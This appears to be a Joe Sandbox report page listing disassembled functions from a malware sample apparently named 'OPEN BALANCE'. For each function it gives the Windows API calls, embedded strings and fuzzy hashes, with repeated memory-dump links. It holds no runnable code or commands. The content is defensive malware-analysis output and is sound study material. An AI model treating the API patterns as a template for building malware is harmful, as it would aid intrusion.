Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
String ID:
API String ID: 72514467-0
Opcode ID: 7602ca907cd8e1ee2ad0796f3fef3fb174c7bd00ce046ed0d0d70eddf98ec3dc
Instruction ID: 83ce7fa8b28d440ba375ae15ad06e146891a0f5eda1cb40d7e3ae263332e363f
Opcode Fuzzy Hash: 7602ca907cd8e1ee2ad0796f3fef3fb174c7bd00ce046ed0d0d70eddf98ec3dc
Instruction Fuzzy Hash: 5F2107316052057BFF555B39AC0AE7B7B9CFF86760F10502EF909CA192EAA5DC00C2A1

Function 008A175D Relevance: 9.1, APIs: 6, Instructions: 68memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 008A0FB4: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 008A0FCA
Part of subcall function 008A0FB4: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 008A0FD6
Part of subcall function 008A0FB4: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 008A0FE5
Part of subcall function 008A0FB4: RtlAllocateHeap.NTDLL(00000000,?,00000002), ref: 008A0FEC
Part of subcall function 008A0FB4: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 008A1002

GetLengthSid.ADVAPI32(?,00000000,008A1335), ref: 008A17AE
GetProcessHeap.KERNEL32(00000008,00000000), ref: 008A17BA
RtlAllocateHeap.NTDLL(00000000), ref: 008A17C1
CopySid.ADVAPI32(00000000,00000000,?), ref: 008A17DA
GetProcessHeap.KERNEL32(00000000,00000000,008A1335), ref: 008A17EE
HeapFree.KERNEL32(00000000), ref: 008A17F5

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: Heap$Process$AllocateInformationToken$CopyErrorFreeLastLength
String ID:
API String ID: 169236558-0
Opcode ID: 456e3593df97eaf574494c9862cc170e0cd65eb722bfebc182222a8ebf3458cc
Instruction ID: e94cfb15a976f1c1d87a750de25425482ca32e0f2f8d9cde24414a13cdb0d25d
Opcode Fuzzy Hash: 456e3593df97eaf574494c9862cc170e0cd65eb722bfebc182222a8ebf3458cc
Instruction Fuzzy Hash: 0611BB32611616FFEF109FA4CC49FAE7BA9FB42359F104219F481E7294D736A940CB60

Function 00863382 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00863379,00862FE5), ref: 00863390
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0086339E
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 008633B7
SetLastError.KERNEL32(00000000,?,00863379,00862FE5), ref: 00863409

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 7c5a892f12d72dccf9cb7c7f598f9a6dc9cf3efd987f5fdd27819ea19a94f300
Instruction ID: 099778424862f057b846374fd180a69d7df5d95131fde7eb8c1c98bcd777cc60
Opcode Fuzzy Hash: 7c5a892f12d72dccf9cb7c7f598f9a6dc9cf3efd987f5fdd27819ea19a94f300
Instruction Fuzzy Hash: A901F77361D311BEEA252778BD85A6B2BA4FB25379722032EF510C53F0EF114D11A544

Function 00872D74 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00875686,00883CD6,?,00000000,?,00875B6A,?,?,?,?,?,0086E6D1,?,00908A48), ref: 00872D78
_free.LIBCMT ref: 00872DAB
_free.LIBCMT ref: 00872DD3
SetLastError.KERNEL32(00000000,?,?,?,?,0086E6D1,?,00908A48,00000010,00844F4A,?,?,00000000,00883CD6), ref: 00872DE0
SetLastError.KERNEL32(00000000,?,?,?,?,0086E6D1,?,00908A48,00000010,00844F4A,?,?,00000000,00883CD6), ref: 00872DEC
_abort.LIBCMT ref: 00872DF2

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: 627523dbea945e0c7f348b5e37bc41a58c468111626aac393b97249f791033d6
Instruction ID: 5ada9f9c65cfc90cc7c5da1d31cda4c6d16813acb76049815b0c33933d665cd4
Opcode Fuzzy Hash: 627523dbea945e0c7f348b5e37bc41a58c468111626aac393b97249f791033d6
Instruction Fuzzy Hash: 9BF0A9355096056BC632277C7C06F5A1E59FBC17A5F24C619F82CD21EEDF34C8415162

Function 008D8A24 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

Part of subcall function 00859639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00859693
Part of subcall function 00859639: SelectObject.GDI32(?,00000000), ref: 008596A2
Part of subcall function 00859639: BeginPath.GDI32(?), ref: 008596B9
Part of subcall function 00859639: SelectObject.GDI32(?,00000000), ref: 008596E2

MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 008D8A4E
LineTo.GDI32(?,00000003,00000000), ref: 008D8A62
MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 008D8A70
LineTo.GDI32(?,00000000,00000003), ref: 008D8A80
EndPath.GDI32(?), ref: 008D8A90
StrokePath.GDI32(?), ref: 008D8AA0

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: Path$LineMoveObjectSelect$BeginCreateStroke
String ID:
API String ID: 43455801-0
Opcode ID: b1683e17eff9a9222c74e37bfe064da73d5865b6bcd8418cca7af5fdb3ac4c92
Instruction ID: d9353c8c2c4de72118843793aaf703ffc8bb40789c0241deac72dd2635feb3a7
Opcode Fuzzy Hash: b1683e17eff9a9222c74e37bfe064da73d5865b6bcd8418cca7af5fdb3ac4c92
Instruction Fuzzy Hash: 67110976005159FFDF129F94DC88EAA7F6CFB08390F008112FA199A1A1C7719D55DBA0

Function 008A51FD Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 008A5218
GetDeviceCaps.GDI32(00000000,00000058), ref: 008A5229
GetDeviceCaps.GDI32(00000000,0000005A), ref: 008A5230
ReleaseDC.USER32(00000000,00000000), ref: 008A5238
MulDiv.KERNEL32(000009EC,?,00000000), ref: 008A524F
MulDiv.KERNEL32(000009EC,00000001,?), ref: 008A5261

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: f5640e2372eb933d150d1bb486cadf95050fcf300ac0e8cfa7ff1433657a6026
Instruction ID: 9a8ad4c3ffd3431b7c582cf777f453aadec7cfcda3afd3cc665a08b23b614498
Opcode Fuzzy Hash: f5640e2372eb933d150d1bb486cadf95050fcf300ac0e8cfa7ff1433657a6026
Instruction Fuzzy Hash: EF014F75A01719BBEF109BA69C49B5EBFB8FF48751F084166FA04E7681DA709C00CFA0

Function 00841BC3 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 00841BF4
MapVirtualKeyW.USER32(00000010,00000000), ref: 00841BFC
MapVirtualKeyW.USER32(000000A0,00000000), ref: 00841C07
MapVirtualKeyW.USER32(000000A1,00000000), ref: 00841C12
MapVirtualKeyW.USER32(00000011,00000000), ref: 00841C1A
MapVirtualKeyW.USER32(00000012,00000000), ref: 00841C22

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: 6f77d5e210fb1a10af5f5eb5167f05d4e43f22f916c3b9bab3ec6672d09ce521
Instruction ID: a2d74489e4ea9c5227be14a86496d3dbe7ee6e114dc431a4a99c4be8d19098c1
Opcode Fuzzy Hash: 6f77d5e210fb1a10af5f5eb5167f05d4e43f22f916c3b9bab3ec6672d09ce521
Instruction Fuzzy Hash: BE016CB090275A7DE3008F5A8C85B52FFA8FF19354F00411BD15C47941C7F5A864CBE5

Function 008AEB20 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,00000000), ref: 008AEB30
SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 008AEB46
GetWindowThreadProcessId.USER32(?,?), ref: 008AEB55
OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 008AEB64
TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 008AEB6E
CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 008AEB75

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: bcad3b5632401f787d13fe1d0f8c55d38f9abc337ffd6a46390a84838b111746
Instruction ID: c6a990b652cc8874ddb2dc3657bede0cebbdb1757d5664caf50700775c7a3dd0
Opcode Fuzzy Hash: bcad3b5632401f787d13fe1d0f8c55d38f9abc337ffd6a46390a84838b111746
Instruction Fuzzy Hash: DFF03072142169BBEB215B52AC0DEEF7B7CFFCAB11F00025AF601D1191D7A05A01C6B5

Function 00897439 Relevance: 9.0, APIs: 6, Instructions: 37windowCOMMON

Download Yara Rule

APIs

GetClientRect.USER32(?), ref: 00897452
SendMessageW.USER32(?,00001328,00000000,?), ref: 00897469
GetWindowDC.USER32(?), ref: 00897475
GetPixel.GDI32(00000000,?,?), ref: 00897484
ReleaseDC.USER32(?,00000000), ref: 00897496
GetSysColor.USER32(00000005), ref: 008974B0

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: ClientColorMessagePixelRectReleaseSendWindow
String ID:
API String ID: 272304278-0
Opcode ID: dbc80ac564a0242410b82b2320efa0c5ffd1fd192b1bbdab2fe17c016c193b6f
Instruction ID: eefb547e2193612839c0c5b4c7e22e35576802431ddc91393f4ce76725444f89
Opcode Fuzzy Hash: dbc80ac564a0242410b82b2320efa0c5ffd1fd192b1bbdab2fe17c016c193b6f
Instruction Fuzzy Hash: 55018B3140521AEFDB506FA4EC08BAE7BB5FB04311F140265FA15A21A1CB311E41EB10

Function 008AC5D0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 191windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00847620: _wcslen.LIBCMT ref: 00847625

GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 008AC6EE
_wcslen.LIBCMT ref: 008AC735
SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 008AC79C
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 008AC7CA

Strings

0, xrefs: 008AC6AF

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: ItemMenu$Info_wcslen$Default
String ID: 0
API String ID: 1227352736-4108050209
Opcode ID: ef16e5585010e7cec1ce66ca3100390851f64ccd71407aead17ffa3acfb59f56
Instruction ID: 518752f4407aebab8922bd400fc706a0803d827b41af477f43602feaa01419a8
Opcode Fuzzy Hash: ef16e5585010e7cec1ce66ca3100390851f64ccd71407aead17ffa3acfb59f56
Instruction Fuzzy Hash: F451EE716043059BE715DF2CC885BAA77E8FF8A314F040A2DFAA5D29A1DB64D844CB92

Function 008CAD64 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 176COMMON

Download Yara Rule

APIs

ShellExecuteExW.SHELL32(0000003C), ref: 008CAEA3

Part of subcall function 00847620: _wcslen.LIBCMT ref: 00847625

GetProcessId.KERNEL32(00000000), ref: 008CAF38
CloseHandle.KERNEL32(00000000), ref: 008CAF67

Strings

<, xrefs: 008CAE6B
@, xrefs: 008CAE72

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: CloseExecuteHandleProcessShell_wcslen
String ID: <$@
API String ID: 146682121-1426351568
Opcode ID: 9637de2096902dd69833f5ac85ce358eee7f156d465d5a3aabf63cbb44935c01
Instruction ID: 74c19730f651e356cec7f611181ba505ccecd3f3eab9ca5375cd07254636fea4
Opcode Fuzzy Hash: 9637de2096902dd69833f5ac85ce358eee7f156d465d5a3aabf63cbb44935c01
Instruction Fuzzy Hash: B7714574A00619DFCB18DF58C485A9EBBB4FF08318F05849DE816AB362CB75ED45CB92

Function 008A1DE2 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00849CB3: _wcslen.LIBCMT ref: 00849CBD

Part of subcall function 008A3CA7: GetClassNameW.USER32(?,?,000000FF), ref: 008A3CCA

SendMessageW.USER32(?,00000188,00000000,00000000), ref: 008A1E66
SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 008A1E79
SendMessageW.USER32(?,00000189,?,00000000), ref: 008A1EA9

Part of subcall function 00846B57: _wcslen.LIBCMT ref: 00846B6A

Strings

ListBox, xrefs: 008A1E25
ComboBox, xrefs: 008A1DF0

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: MessageSend$_wcslen$ClassName
String ID: ComboBox$ListBox
API String ID: 2081771294-1403004172
Opcode ID: ea5d665ac0ad07234e09fc2ad5d58a6041f5cc8f9ccb64f83646507179751755
Instruction ID: 565dfb056b28f99961946502e3a9f7de8caafd8ab7ba8b913bc0133ead046ed0
Opcode Fuzzy Hash: ea5d665ac0ad07234e09fc2ad5d58a6041f5cc8f9ccb64f83646507179751755
Instruction Fuzzy Hash: 1D21F371A00108AEEF14AB68DC4ACFFB7B9FF56364F104129F825E71E1DB344919C621

Function 008D2F17 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78windowlibraryCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 008D2F8D
LoadLibraryW.KERNEL32(?), ref: 008D2F94
SendMessageW.USER32(?,00000467,00000000,00000000), ref: 008D2FA9
DestroyWindow.USER32(?), ref: 008D2FB1

Strings

SysAnimate32, xrefs: 008D2F68

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: MessageSend$DestroyLibraryLoadWindow
String ID: SysAnimate32
API String ID: 3529120543-1011021900
Opcode ID: a593a4d50b38cad08dfe004fc2a6b591dc6ae0e876fe596f160d44a3a8970fde
Instruction ID: 94dbf84ef537d408425a84a05feb1dcc0cd0f7116801da64dd4136330794b62d
Opcode Fuzzy Hash: a593a4d50b38cad08dfe004fc2a6b591dc6ae0e876fe596f160d44a3a8970fde
Instruction Fuzzy Hash: 8B218E71204209AFEB205F64DC80EBB77B9FF69368F104B1AF954D6290DB71DC51A760

Function 00864D6D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00864D1E,008728E9,?,00864CBE,008728E9,009088B8,0000000C,00864E15,008728E9,00000002), ref: 00864D8D
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00864DA0
FreeLibrary.KERNEL32(00000000,?,?,?,00864D1E,008728E9,?,00864CBE,008728E9,009088B8,0000000C,00864E15,008728E9,00000002,00000000), ref: 00864DC3

Strings

mscoree.dll, xrefs: 00864D86
CorExitProcess, xrefs: 00864D98

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 02e99fb8271fefcbafb7d2cd9805af08c9420a6724a50b9a93445f534ec466e9
Instruction ID: 1dbf1983e47e9c6c122476293a5c10ec77a24d7628b0d5b8d0989aff9e36cfc9
Opcode Fuzzy Hash: 02e99fb8271fefcbafb7d2cd9805af08c9420a6724a50b9a93445f534ec466e9
Instruction Fuzzy Hash: 4BF0AF30A01219BBDB109F91DC09BAEBBB9FF44752F0102A5F805E2260CF715980DE90

Function 0089D3A0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 0089D3AD
GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0089D3BF
FreeLibrary.KERNEL32(00000000), ref: 0089D3E5

Strings

X64, xrefs: 0089D2A8
GetSystemWow64DirectoryW, xrefs: 0089D3B9

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: GetSystemWow64DirectoryW$X64
